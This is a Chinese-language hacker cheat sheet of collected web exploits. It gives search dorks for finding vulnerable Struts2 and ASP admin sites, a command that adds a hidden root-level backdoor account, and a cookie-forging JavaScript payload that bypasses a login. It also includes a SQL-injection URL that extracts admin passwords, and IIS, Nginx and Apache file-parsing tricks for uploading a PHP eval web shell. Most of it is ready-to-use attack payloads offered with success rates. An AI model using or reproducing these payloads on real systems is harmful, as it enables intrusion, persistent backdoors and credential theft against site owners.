收集整理的各种web漏洞
struts2:
Inurl:index.action
Inurl:商城.action
Inurl:index.action 标题:apache struts2
Inurl:action?id=
site:.com inurl:index.action
inurl:dhis-web-commons
利用工具操作,账号密码添加:
useradd -u 0 -o -g root -G root -d /home/bingdao bingdao -p $1$jWIKT776$A8S37J9KR3Z4dpbJVX3rW0
账号:bingdao
密码:1
生成加密密码详情:
以下为生成加密密码命令(第一个1就是密码):
echo "1" | openssl passwd -1 -salt $(< /dev/urandom tr -dc '[:alnum:]' | head -c 32) -stdin
生成的加密密码:$1$Rfst5gRR$dqbE2NR0npnFMyeLchbk0/
然后添加权限为root的账号和上面的密码:
useradd -u 0 -o -g root -G root -d /home/lengyu lengyu -p'$1$Rfst5gRR$dqbE2NR0npnFMyeLchbk0/'
就得到了账号为“lengyu”,密码为“1”的用户,然后再ssh上去
------------------------------------------------------
szwyadmin cookies欺骗:
inurl:szwyadmin/login.asp
inurl:szwyadmin
代码:
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));javascript:alert(document.cookie="adminpass="+escape("'or'='or'"));javascript:alert(document.cookie="admindj="+escape("1"));
代码复制然后回车。。~ 方便快捷。。然后关闭网页重新打开后台地址,然后在地址栏中将login.asp改为admin_index.asp 就直接进入后台了,这种方法成功率百分之80以上。
另外这套程序还有一个爆密码的oday。
使用方法很简单。直接填写域名然后点击爆密码。~~~ 直接射出管理员帐号密码。成功率不是很理想毕竟是很多的漏洞了.
-------------------------------------------------------------------------------------------------------------------------
南方数据:
inurl:HrDemand.asp
/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='
admin/southidceditor/admin_style.asp
--------------------------------------------
爆库:
inurl:conn.asp
----------------
iis6 解析漏洞:
目录解析 /xx.asp/xx.jpg
说明:在网站下建立文件夹的名字为 .asp 或 .asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。
文件解析 1.asp;.jpg
说明:会被服务器看成是1.asp还有IIS6.0 默认的可执行文件除了asp还包含这三种
/1.asa
/1.cer
/1.cdx
-----------------------------------
iis7.0/iis7.5/ nginx<8.03 畸形解析漏洞:
Nginx解析漏洞这个伟大的漏洞是我国安全组织80sec发现的…
在默认Fast-CGI开启状况下,黑阔上传一个名字为1.jpg,内容为
<?php fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
的文件,然后访问1.jpg/.php,在这个目录下就会生成一句话*** shell.php
------------------------------------------------------------------
Nginx <8.03 空字节代码执行漏洞:
影响版:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37
Nginx在图片中嵌入PHP代码然后通过访问
xxx.jpg%00.php
来执行其中的代码
----------------Apache 解析漏洞
Apache 是从右到左开始判断解析,如果为不可识别解析,就再往左判断.
比如 wooyun.php.owf.rar “.owf”和”.rar” 这两种后缀是apache不可识别解析,apache就会把wooyun.php.owf.rar解析成php.
如何判断是不是合法的后缀就是这个漏洞的利用关键,测试时可以尝试上传一个wooyun.php.rara.jpg.png…(把你知道的常见后缀都写上…)去测试是否是合法后缀
---------------------------------------------------
在windows环境下,xx.jpg[空格] 或xx.jpg. 这两类文件都是不允许存在的,若这样命名,windows会默认除去空格或点,***可以通过抓包,在文件名后加一个空格或者点绕过黑名单.若上传成功,空格和点都会被windows自动消除,这样也可以getshell。
如果在Apache中.htaccess可被执行.且可被上传.那可以尝试在.htaccess中写入:
<FilesMatch "1.jpg"> SetHandler application/x-httpd-php </FilesMatch>
然后再上传shell.jpg的***, 这样shell.jpg就可解析为php文件